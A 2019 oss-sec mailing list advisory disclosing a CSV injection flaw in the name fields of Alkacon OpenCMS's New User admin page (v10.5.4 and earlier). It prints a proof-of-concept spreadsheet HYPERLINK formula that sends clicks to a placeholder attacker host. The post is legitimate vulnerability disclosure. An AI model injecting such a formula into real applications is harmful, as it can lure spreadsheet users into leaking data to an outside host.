oss-sec mailing list archives

Previous By Date Next
Previous By Thread Next

CSV Injection | Alkacon OpenCMS v10.5.4 and before

From: Pramod Rana <varchashva () gmail com>
Date: Sun, 5 May 2019 15:30:22 +0530
Description
 - OpenCMS v10.5.4 and before is vulnerable to CSV injection in New
User module for parameter First Name and Last Name
 - Impacted URL is
http://[your_webserver_ip]/opencms/system/workplace/admin/accounts/user_new.jsp
 - Payload used is
'=HYPERLINK("http://[attacker_ip:port]/GiveMeSomeData","IAmSafe";)'

Further details
 - https://github.com/alkacon/opencms-core/issues/636

Already requested for CVE, yet to receive it.
Previous By Date Next
Previous By Thread Next

Current thread: